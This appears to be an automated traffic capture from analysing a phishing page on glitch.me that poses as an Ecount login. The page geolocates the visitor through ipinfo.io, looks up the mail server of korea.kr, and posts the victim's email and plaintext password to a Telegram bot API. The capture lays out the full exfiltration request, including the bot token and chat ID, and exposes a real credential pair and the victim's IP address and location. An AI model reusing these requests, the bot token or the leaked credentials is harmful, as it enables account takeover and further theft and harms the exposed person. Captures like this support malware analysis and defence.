2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 37 31 63 38 31 46 37 36 63 64 37 31 59 43 32 34 37 30 63 39 32 35 33 59 64 39 32 62 38 33 41 34 58 31 34 39 39 46 32 59 38 41 41 46 64 35 34 32 39 39 66 30 34 37 39 58 66 35 61 39 38 64 58 34 35 31 41 38 66 66 35 36 61 64 4f 34 36 39 26 32 25 39 59 59 61 31 2a 58 36 35 62 63 31 33 36 41 43 31 31 38 36 46 3f 43 36 63 43 32 31 66 32 66 43 43 31 39 38 31 43 33 58 46 32 43 39 34 58 43 38 31 65 30 46 41 32 30 38 64 58 34 33 59 39 32 65 39 34 30 46 34 44 38 32 46 39 63 66 33 34 61 41 31 46 38 34 46 66 39 35 32 39 36 41 59 35 44 34 33 62 30 4e 37 35 58 59 35 50 43 36 33 59 41 31 31 62 34 48 38 36 34 59 32 64 31 36 33 62 37 31 32 36 37 62 66 32 32 33 46 37 43 65 34 34 35 36 62 44 38 32 46 38 36 64 64 33 34 38 62 65 32 33 39 64 36 33 36 38 63 58 39 66 39 39 36 58 Data Ascii: 71c81F76cd71YC2470c9253Yd92b83A4X1499F2Y8AAFd54299f0479Xf5a98dX451A8ff56adO469&2%9YYa1*X65bc136AC1186F?C6cC21f2fCC1981C3XF2C94XC81e0FA208dX43Y92e940F4D82F9cf34aA1F84Ff95296AY5D43b0N75XY5PC63YA11b4H864Y2d163b71267bf223F7Ce4456bD82F86dd348be239d6368cX9f996X
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 39 38 65 66 34 36 64 66 34 33 39 64 58 36 33 65 61 32 43 31 46 58 36 35 66 63 35 62 37 35 39 59 29 38 35 66 62 36 4b 44 36 34 59 59 31 32 36 39 28 32 36 36 63 30 5f 39 36 31 63 35 44 37 36 33 43 37 32 33 37 41 43 43 32 31 34 35 38 32 65 61 38 30 64 66 64 65 38 38 44 59 32 66 38 33 44 35 65 38 34 32 61 36 46 44 35 34 62 36 44 43 34 39 61 30 46 37 34 58 61 35 66 63 62 30 39 34 58 59 35 38 61 66 40 36 35 44 59 34 40 59 37 30 5b 31 35 35 61 38 7c 32 31 35 43 37 61 64 31 41 37 31 43 38 31 66 37 36 43 44 32 34 37 62 31 66 36 61 44 32 31 65 37 37 44 33 58 39 38 37 44 39 33 31 35 32 38 66 66 39 34 59 61 39 33 30 38 46 62 34 64 61 34 37 39 58 66 35 34 43 41 33 66 61 61 65 39 32 58 39 35 36 41 44 25 34 35 59 62 32 7e 39 36 58 46 44 34 66 37 32 31 30 35 63 59 37 7c Data Ascii: 98ef46df439dX63ea2C1FX65fc5b759Y)85fb6KD64YY1269(266c0_961c5D763C7237ACC214582ea80dfde88DY2f83D5e842a6FD54b6DC49a0F74Xa5fcb094XY58af@65DY4@Y70[155a8\|215C7ad1A71C81f76CD247b1f6aD21e77D3X987D931528ff94Ya9308Fb4da479Xf54CA3faae92X956AD%45Yb2~96XFD4f72105cY7\|
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 31 37 36 61 36 44 31 66 25 35 37 32 63 39 32 30 37 37 63 65 32 35 37 63 44 33 32 61 38 31 31 65 37 65 44 34 33 31 34 31 44 58 32 62 39 33 44 35 5e 31 33 65 41 36 66 61 35 36 65 63 33 36 39 35 59 41 65 30 34 44 41 34 66 62 35 32 41 39 7c 30 35 37 41 58 36 32 34 36 39 44 4e 61 36 31 62 38 2b 46 36 36 62 64 31 34 36 59 64 30 35 59 59 37 44 34 36 43 63 34 31 41 36 38 37 41 32 63 31 32 37 46 44 36 32 64 38 34 44 59 33 32 38 39 65 30 33 37 38 65 32 62 38 62 65 31 33 65 34 65 58 59 33 38 41 30 65 32 51 58 34 59 59 33 34 59 39 35 46 34 31 39 33 46 61 63 4c 33 35 61 59 31 54 38 35 46 62 36 48 44 63 31 41 35 46 43 36 39 63 30 31 37 36 65 63 35 31 43 37 33 43 41 32 66 59 58 31 58 37 38 63 61 44 34 38 36 36 63 44 39 33 30 38 37 64 65 33 35 38 43 58 33 33 61 39 31 65 Data Ascii: 176a6D1f%572c92077ce257cD32a811e7eD43141DX2b93D5^13eA6fa56ec3695YAe04DA4fb52A9\|057AX62469DNa61b8+F66bd146Yd05YY7D46Cc41A687A2c127FD62d84DY3289e0378e2b8be13e4eXY38A0e2QX4YY34Y95F4193FacL35aY1T85Fb6HDc1A5FC69c0176ec51C73CA2fYX1X78caD4866cD93087de358CX33a91e
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 32 62 38 36 44 59 33 33 39 36 59 33 4b 34 35 37 41 58 35 32 35 61 58 39 33 62 35 66 65 65 34 30 36 33 7d 30 35 38 39 63 5e 34 31 36 41 46 31 32 35 34 59 34 4b 61 36 37 37 37 4e 37 35 39 62 63 2e 46 36 39 63 64 58 35 32 34 39 46 31 46 37 35 64 32 64 35 34 44 64 61 31 66 38 34 44 37 32 63 37 62 38 64 46 39 33 59 62 38 33 62 38 35 64 63 46 30 36 30 65 32 34 32 39 38 66 35 4a 35 61 36 58 59 34 36 39 62 66 33 35 36 37 33 43 34 31 37 36 65 31 32 31 41 61 39 46 59 31 46 41 58 3b 30 32 33 63 30 31 38 35 63 63 34 64 36 36 66 39 31 31 30 36 61 63 32 32 32 37 63 63 36 33 33 37 32 64 35 32 62 38 38 44 30 33 30 38 44 61 61 65 39 37 41 44 59 66 63 35 33 41 46 66 33 41 35 41 44 33 63 38 58 59 32 34 31 39 33 59 36 34 33 61 33 66 64 35 38 61 31 63 64 34 43 41 36 46 58 35 Data Ascii: 2b86DY3396Y3K457AX525aX93b5fee4063}0589c^416AF1254Y4Ka6777N759bc.F69cdX5249F1F75d2d54Dda1f84D72c7b8dF93Yb83b85dcF060e24298f5J5a6XY469bf35673C4176e121Aa9FY1FAX;023c0185cc4d66f91106ac2227cc63372d52b88D0308Daae97ADYfc53AFf3A5AD3c8XY24193Y643a3fd58a1cd4CA6FX5
2025-03-13 06:35:08 UTC	1378	IN	Data Raw: 3a 44 38 61 7c 44 35 37 41 58 43 32 33 32 62 34 31 34 36 61 63 37 44 37 37 38 62 64 31 38 36 64 63 35 32 38 34 35 39 36 58 39 34 30 58 34 58 43 37 62 63 64 46 31 38 30 44 32 46 35 38 30 58 38 33 46 39 33 46 32 66 66 38 43 65 39 34 39 39 31 46 31 34 31 36 30 66 39 4d 65 41 44 66 66 32 30 39 66 66 39 35 31 62 31 51 62 35 35 63 32 25 31 36 34 59 41 31 37 35 66 59 46 31 63 33 39 37 38 4f 39 36 41 38 58 65 37 36 59 38 32 33 34 33 63 43 59 31 64 34 31 64 30 32 32 34 35 64 66 33 32 37 58 65 64 66 38 38 35 65 32 34 32 38 41 58 41 33 61 35 39 46 32 35 35 39 37 66 37 34 64 61 61 59 41 34 61 39 43 66 66 35 32 61 63 31 30 32 38 36 37 58 32 36 32 59 38 31 35 31 38 39 30 31 64 36 32 43 37 31 61 36 66 59 58 64 30 33 43 37 58 46 59 37 58 63 38 31 46 33 33 61 33 32 35 38 Data Ascii: :D8a\|D57AXC232b4146ac7D778bd186dc5284596X940X4XC7bcdF180D2F580X83F93F2ff8Ce94991F14160f9MeADff209ff951b1Qb55c2%164YA175fYF1c3978O96A8Xe76Y82343cCY1d41d02245df327Xedf885e2428AXA3a59F25597f74daaYA4a9Cff52ac102867X262Y81518901d62C71a6fYXd03C7XFY7Xc81F33a3258

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:35:15 UTC	680	OUT	GET /uploads/2020/06/ECount-logo1-220x90.png HTTP/1.1 Host: financesonline.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Referer: https://magnificent-absorbed-ravioli.glitch.me/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:35:15 UTC	480	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 06:35:15 GMT Content-Type: image/png Content-Length: 3131 Connection: close X-Sucuri-ID: 12011 Last-Modified: Mon, 08 Jun 2020 11:25:47 GMT Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 FO-Info: pbs Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, OPTIONS Server: Sucuri/Cloudproxy X-Sucuri-Cache: HIT Alt-Svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000 Accept-Ranges: bytes
2025-03-13 06:35:15 UTC	3131	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 dc 00 00 00 5a 08 06 00 00 00 d3 b3 38 44 00 00 0c 02 49 44 41 54 78 da ed 5d 01 64 5d c9 1a 8e 88 88 8a bc 88 88 88 e8 56 d5 aa ca 8b 88 15 ab aa 2a 22 22 a2 22 22 a2 22 aa 2f 5b dd a8 be 95 57 51 15 a5 2a d6 5a 55 4f d5 aa aa aa aa aa aa a8 be aa aa 58 15 55 51 55 51 11 55 15 55 55 51 55 11 51 15 95 f7 0f df f5 e6 8d 39 33 e7 dc 73 ce 3d 67 77 bf 8f 4f da 39 e7 cc cc bd 67 be 3b 33 ff 3f f3 4f 59 19 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 7f 4d fc a7 f6 9b 16 e1 68 46 1c 28 b6 de 77 ff b6 b5 46 9e 6f 17 f6 0a 0f c4 a8 43 77 94 72 c7 7e f8 b1 7a ec f0 78 ab b0 47 38 2c 1c 05 87 84 Data Ascii: PNGIHDRZ8DIDATx]d]V"""""/[WQZUOXUQUQUUUQUQ93s=gwO9g;3?OYAAAAAAAAAAAAAAAAAAMhF(wFoCwr~zxG8,

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:35:17 UTC	421	OUT	GET /uploads/2020/06/ECount-logo1-220x90.png HTTP/1.1 Host: financesonline.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:35:18 UTC	480	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 06:35:17 GMT Content-Type: image/png Content-Length: 3131 Connection: close X-Sucuri-ID: 12011 Last-Modified: Mon, 08 Jun 2020 11:25:47 GMT Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 FO-Info: pbs Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, OPTIONS Server: Sucuri/Cloudproxy X-Sucuri-Cache: HIT Alt-Svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000 Accept-Ranges: bytes
2025-03-13 06:35:18 UTC	3131	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 dc 00 00 00 5a 08 06 00 00 00 d3 b3 38 44 00 00 0c 02 49 44 41 54 78 da ed 5d 01 64 5d c9 1a 8e 88 88 8a bc 88 88 88 e8 56 d5 aa ca 8b 88 15 ab aa 2a 22 22 a2 22 22 a2 22 aa 2f 5b dd a8 be 95 57 51 15 a5 2a d6 5a 55 4f d5 aa aa aa aa aa aa a8 be aa aa 58 15 55 51 55 51 11 55 15 55 55 51 55 11 51 15 95 f7 0f df f5 e6 8d 39 33 e7 dc 73 ce 3d 67 77 bf 8f 4f da 39 e7 cc cc bd 67 be 3b 33 ff 3f f3 4f 59 19 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 04 41 10 7f 4d fc a7 f6 9b 16 e1 68 46 1c 28 b6 de 77 ff b6 b5 46 9e 6f 17 f6 0a 0f c4 a8 43 77 94 72 c7 7e f8 b1 7a ec f0 78 ab b0 47 38 2c 1c 05 87 84 Data Ascii: PNGIHDRZ8DIDATx]d]V"""""/[WQZUOXUQUQUUUQUQ93s=gwO9g;3?OYAAAAAAAAAAAAAAAAAAMhF(wFoCwr~zxG8,

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:35:42 UTC	594	OUT	GET /json HTTP/1.1 Host: ipinfo.io Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://magnificent-absorbed-ravioli.glitch.me Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://magnificent-absorbed-ravioli.glitch.me/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:35:42 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 311 content-type: application/json; charset=utf-8 date: Thu, 13 Mar 2025 06:35:42 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-13 06:35:42 UTC	311	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 32 30 36 2e 32 35 35 2e 31 36 33 2e 31 39 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 66 6f 72 65 73 74 30 32 63 70 65 2e 31 39 38 2e 31 36 33 2e 32 35 35 2e 32 30 36 2e 61 72 6b 2e 63 61 62 6c 65 6c 79 6e 78 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 57 79 6e 6e 65 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 41 72 6b 61 6e 73 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 35 2e 32 32 34 35 2c 2d 39 30 2e 37 38 36 38 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 31 36 35 31 20 43 61 62 6c 65 6c 79 6e 78 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 32 33 39 36 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 Data Ascii: { "ip": "206.255.163.198", "hostname": "forest02cpe.198.163.255.206.ark.cablelynx.com", "city": "Wynne", "region": "Arkansas", "country": "US", "loc": "35.2245,-90.7868", "org": "AS1651 Cablelynx", "postal": "72396", "timezone": "America

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:35:44 UTC	620	OUT	GET /resolve?name=korea.kr&type=MX HTTP/1.1 Host: dns.google Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://magnificent-absorbed-ravioli.glitch.me Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://magnificent-absorbed-ravioli.glitch.me/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:35:45 UTC	547	IN	HTTP/1.1 200 OK X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Date: Thu, 13 Mar 2025 06:35:45 GMT Expires: Thu, 13 Mar 2025 06:35:45 GMT Cache-Control: private, max-age=188 Content-Type: application/json; charset=UTF-8 Server: HTTP server (unknown) X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-13 06:35:45 UTC	197	IN	Data Raw: 62 66 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6b 6f 72 65 61 2e 6b 72 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6b 6f 72 65 61 2e 6b 72 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 31 38 38 2c 22 64 61 74 61 22 3a 22 30 20 61 6e 74 69 73 70 61 6d 2e 6b 6f 72 65 61 2e 6b 72 2e 22 7d 5d 7d 0d 0a Data Ascii: bf{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"korea.kr.","type":15}],"Answer":[{"name":"korea.kr.","type":15,"TTL":188,"data":"0 antispam.korea.kr."}]}
2025-03-13 06:35:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:35:47 UTC	403	OUT	GET /resolve?name=korea.kr&type=MX HTTP/1.1 Host: dns.google Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:35:48 UTC	547	IN	HTTP/1.1 200 OK X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Date: Thu, 13 Mar 2025 06:35:47 GMT Expires: Thu, 13 Mar 2025 06:35:47 GMT Cache-Control: private, max-age=600 Content-Type: application/json; charset=UTF-8 Server: HTTP server (unknown) X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-13 06:35:48 UTC	253	IN	Data Raw: 66 37 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6b 6f 72 65 61 2e 6b 72 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6b 6f 72 65 61 2e 6b 72 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 36 30 30 2c 22 64 61 74 61 22 3a 22 30 20 61 6e 74 69 73 70 61 6d 2e 6b 6f 72 65 61 2e 6b 72 2e 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 6e 73 32 2e 67 63 63 2e 67 6f 2e 6b 72 2e 28 32 33 2e 36 31 2e 31 39 39 2e 36 34 29 2e 22 7d 0d 0a Data Ascii: f7{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"korea.kr.","type":15}],"Answer":[{"name":"korea.kr.","type":15,"TTL":600,"data":"0 antispam.korea.kr."}],"Comment":"Response from ns2.gcc.go.kr.(23.61.199.64)."}
2025-03-13 06:35:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:35:47 UTC	787	OUT	POST /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive Content-Length: 607 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: https://magnificent-absorbed-ravioli.glitch.me Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://magnificent-absorbed-ravioli.glitch.me/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:35:47 UTC	607	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 37 33 39 32 36 39 34 33 34 26 74 65 78 74 3d 2d 2d 2d 2d 2d 2d 2d 2d 25 32 42 2b 45 63 6f 75 6e 74 2b 52 65 5a 75 6c 54 2b 57 79 6e 6e 65 2b 41 72 6b 61 6e 73 61 73 25 32 43 2b 55 53 2b 25 32 42 2d 2d 2d 2d 2d 2d 2d 2d 25 30 41 45 6d 61 69 6c 2b 25 33 41 2b 79 65 63 30 31 31 34 25 34 30 6b 6f 72 65 61 2e 6b 72 25 30 41 50 61 73 73 77 6f 72 64 2b 25 33 41 2b 2a 6c 25 35 44 59 77 55 65 7a 58 28 78 25 35 44 25 30 41 43 68 65 63 6b 65 72 25 33 41 2b 79 65 63 30 31 31 34 25 34 30 6b 6f 72 65 61 2e 6b 72 25 33 41 2a 6c 25 35 44 59 77 55 65 7a 58 28 78 25 35 44 25 30 41 42 72 6f 77 73 65 72 2b 25 33 41 2b 35 2e 30 2b 28 57 69 6e 64 6f 77 73 2b 4e 54 2b 31 30 2e 30 25 33 42 2b 57 69 6e 36 34 25 33 42 2b 78 36 34 29 2b 41 70 70 6c 65 57 Data Ascii: chat_id=1739269434&text=--------%2B+Ecount+ReZulT+Wynne+Arkansas%2C+US+%2B--------%0AEmail+%3A+yec0114%40korea.kr%0APassword+%3A+l%5DYwUezX(x%5D%0AChecker%3A+yec0114%40korea.kr%3Al%5DYwUezX(x%5D%0ABrowser+%3A+5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleW
2025-03-13 06:35:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 13 Mar 2025 06:35:48 GMT Content-Type: application/json Content-Length: 978 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-03-13 06:35:48 UTC	978	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 32 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 35 31 33 30 38 31 33 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 67 62 69 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 70 69 73 61 70 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 33 39 32 36 39 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6f 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 5f 6d 6f 6f 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 31 38 34 37 37 34 38 2c 22 74 65 78 74 22 3a 22 2d 2d 2d Data Ascii: {"ok":true,"result":{"message_id":40222,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1741847748,"text":"---

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:35:51 UTC	441	OUT	GET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:35:51 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 13 Mar 2025 06:35:51 GMT Content-Type: application/json Content-Length: 80 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-03-13 06:35:51 UTC	80	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:36:06 UTC	594	OUT	GET /json HTTP/1.1 Host: ipinfo.io Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://magnificent-absorbed-ravioli.glitch.me Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://magnificent-absorbed-ravioli.glitch.me/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-13 06:36:06 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 311 content-type: application/json; charset=utf-8 date: Thu, 13 Mar 2025 06:36:06 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-13 06:36:06 UTC	311	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 32 30 36 2e 32 35 35 2e 31 36 33 2e 31 39 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 66 6f 72 65 73 74 30 32 63 70 65 2e 31 39 38 2e 31 36 33 2e 32 35 35 2e 32 30 36 2e 61 72 6b 2e 63 61 62 6c 65 6c 79 6e 78 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 57 79 6e 6e 65 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 41 72 6b 61 6e 73 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 35 2e 32 32 34 35 2c 2d 39 30 2e 37 38 36 38 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 31 36 35 31 20 43 61 62 6c 65 6c 79 6e 78 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 32 33 39 36 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 Data Ascii: { "ip": "206.255.163.198", "hostname": "forest02cpe.198.163.255.206.ark.cablelynx.com", "city": "Wynne", "region": "Arkansas", "country": "US", "loc": "35.2245,-90.7868", "org": "AS1651 Cablelynx", "postal": "72396", "timezone": "America

Timestamp	Bytes transferred	Direction	Data
2025-03-13 06:36:08 UTC	377	OUT	GET /json HTTP/1.1 Host: ipinfo.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
